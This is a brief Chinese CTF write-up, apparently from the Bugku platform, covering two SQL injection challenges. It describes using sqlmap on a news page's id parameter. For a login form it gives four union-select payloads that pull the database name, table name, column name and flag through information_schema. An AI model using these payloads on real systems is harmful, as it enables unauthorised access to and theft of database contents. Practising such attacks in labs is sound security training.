实战2-注入
打开是个网页(实战嘛),提示是注入问题,那就找注入点。在url里找?id=...的形式,最后在news那里找到了。用sqlmap进行注入测试:
显示的是可以注入,那就进行注入吧。
两个数据库,逐个验证知道要的是第二个数据库
最后一个表名就是要的flag
这是一个神奇的登陆框
url显示的是个注入问题,右键查看源码,显示的是要输入admin的账号,那就用户名admin,密码随便写个1,尝试登陆,结果不行。那密码写1',还是不行。试试1",结果页面返回sql注入错误,说明可以注入!用order by查明两个字段,而且也没用什么过滤。然后就尽情注入获取flag。
构造" union select database(),1 #获取数据库名bugkusql1
构造" union select table_name,1 from information_schema.tables where table_schema='bugkusql1'#获取表名flag1
构造" union select column_name,1 from information_schema.columns where table_schema='bugkusql1' and table_name='flag1'#获取列名flag1
构造" union select flag1,1 from flag1#获取flag
